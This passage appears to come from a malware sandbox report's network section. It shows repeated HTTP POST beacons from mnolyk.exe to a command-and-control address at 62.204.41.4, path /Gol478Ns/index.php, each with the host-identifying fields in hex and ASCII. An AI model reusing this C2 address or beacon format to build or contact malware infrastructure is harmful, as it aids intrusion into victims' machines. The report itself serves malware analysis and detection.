                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      316192.168.2.75001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:27.300770044 CET431OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.364865065 CET431INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      317192.168.2.75001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:27.539545059 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.603720903 CET432INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      318192.168.2.75001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:27.775981903 CET433OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.839906931 CET433INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      319192.168.2.75001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:28.008248091 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.073843002 CET434INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      32192.168.2.74972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:09.303742886 CET136OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.365572929 CET136INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      320192.168.2.75001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:28.258645058 CET435OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.321769953 CET435INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      321192.168.2.75001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:28.501580000 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.563205957 CET436INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      322192.168.2.75001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:28.743484974 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.806921005 CET437INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      323192.168.2.75001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:28.986006975 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.053009033 CET438INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      324192.168.2.75001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:29.231062889 CET439OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.294914961 CET439INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      325192.168.2.75002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:29.489589930 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.554568052 CET440INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      326192.168.2.75002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:29.768912077 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.833816051 CET441INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      327192.168.2.75002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:30.007206917 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.073004961 CET442INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      328192.168.2.75002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:30.249608994 CET443OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.312088013 CET443INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      329192.168.2.75002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:30.495661020 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.559978962 CET444INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      33192.168.2.74972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:09.536305904 CET137OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.600039959 CET137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      330192.168.2.75002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:30.727716923 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.790111065 CET445INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      331192.168.2.75002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:30.966267109 CET446OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.029891968 CET446INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      332192.168.2.75002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:31.210464001 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.274440050 CET447INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      333192.168.2.75002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:31.449239016 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
